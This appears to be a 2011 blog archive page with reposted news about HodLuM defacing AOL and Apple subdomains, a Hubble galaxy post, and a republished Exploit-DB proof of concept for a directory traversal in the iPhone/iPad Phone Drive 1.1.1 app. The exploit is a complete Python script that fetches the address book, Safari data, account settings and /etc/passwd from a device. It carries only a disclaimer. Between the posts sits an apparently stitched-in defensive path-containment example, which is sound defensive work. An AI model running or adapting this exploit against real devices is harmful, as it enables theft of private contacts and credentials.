24 posts in 'Global_Gossip/2011'

  1. 2011.08.29 AOL Postmaster Website hacked by HODLUM by bitfox
  2. 2011.08.29 Apple subdomain hacked by bitfox
  3. 2011.08.10 iPhone/iPad Phone Drive 1.1.1 Directory Traversal by bitfox
  4. 2011.08.08 [NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64 by bitfox
AOL Postmaster Website hacked by HODLUM

AOL’s postmaster.aol.com website was hacked Saturday afternoon by someone who goes by the name “HodLuM.” The site was slightly defaced with a message from the hacker. “AOL S3RV3RZ ROOT3D BY HODLUM LOLZ!,” the message read.

AOL finally discovered the hack, and fixed the page between two and four hours after evidence of the breach was posted to Reddit.com. The various forums where this hack was posted all included various jokes along the lines of, “AOL still exists?!” Ouch…

The AOL Postmaster blog has so far not responded to the hack. The hack of AOL Postmaster comes at the end of a difficult week for AOL. While the hack of a minor AOL web property has nothing to do with the poor performance of its stock, the incident can only serve to worsen the mood at a company that’s struggling to stay upright.

So AOL got cracked too. Only a subdomain, though... Those HODLUM crackers take their pranks too far..


[Source] http://www.thehackernews.com/2011/08/aol-postmaster-website-hacked-by-hodlum.html
 

Posted by bitfox
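Even the mighty Apple got hit. Not the main domain, but a subdomain all the same.. Well. I do have some experience(?) with global companies, but I wonder how things are set up at a place like this.. heh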


One of Apple's subdomains is claimed to have been defaced by HodLuM, as shown above. The deface link is just an image uploaded to the Apple domain. The hacker uses the word "N00BZ" for all hackers, including Anonymous, Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. The AOL Postmaster website was also hacked by HODLUM some months before.


[Source]: http://www.thehackernews.com/2011/08/apple-website-hacked-by-hodlum.html
Posted by bitfox
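A Directory Traversal vulnerability has been disclosed for jailbroken iPhones/iPads.
As you can see from the code below, Python code that steals the personal address book
has been written and published.
As expected, let's avoid jailbreaking if at all possible.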


#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)


[Source] www.exploit-db.com/exploits/17645/

[notice: Please be advised that responsibility for any malicious use lies with the user.]
Posted by bitfox
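
Seen from the server side, the `..%2f` request path in the script above is stopped by decoding the path before validating it, then checking that the resolved file stays inside the shared folder. The Python 3 code below is an added example, not code from the advisory or from Phone Drive; `resolve_shared_path`, `demo` and the temporary share root are hypothetical names, and the sample requests are constructed.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_shared_path(doc_root, request_path):
    """Map a raw HTTP request path to a file inside doc_root, or return None."""
    root = os.path.realpath(doc_root)
    # Decode once, exactly as the file-serving layer would, before any check.
    decoded = unquote(request_path)
    # Refuse paths that would decode again (e.g. %252f) and embedded NULs, so
    # no later layer can turn an already-checked path into a different one.
    if unquote(decoded) != decoded or "\x00" in decoded:
        return None
    # Treat backslashes as separators and make the path relative to the root.
    relative = decoded.replace("\\", "/").lstrip("/")
    # realpath collapses ".." and follows symlinks, giving the file that
    # would really be opened.
    candidate = os.path.realpath(os.path.join(root, relative))
    # Containment check: the resolved file must still live under the root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo():
    """Run constructed sample requests against a temporary share root."""
    root = tempfile.mkdtemp()  # constructed share root, not a real device path
    os.makedirs(os.path.join(root, "docs"))
    requests = {
        "normal": "/docs/readme.txt",
        # Same path shape the script on this page requests.
        "page_payload": "/" + "..%2f" * 8 + "/etc/passwd",
        "double_encoded": "/..%252f..%252fetc/passwd",
    }
    return root, {k: resolve_shared_path(root, p) for k, p in requests.items()}


if __name__ == "__main__":
    share_root, results = demo()
    for name, resolved in results.items():
        print(name, "->", resolved or "rejected")
```

Checking only the raw string for `../` misses this request, because the separator arrives as `%2f`; the check has to run on the decoded, fully resolved path.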

The universe is beyond mysterious; it is awe-inspiring.. :>

[Source] http://hubblesite.org/gallery/album/galaxy/pr2004004a/
Posted by bitfox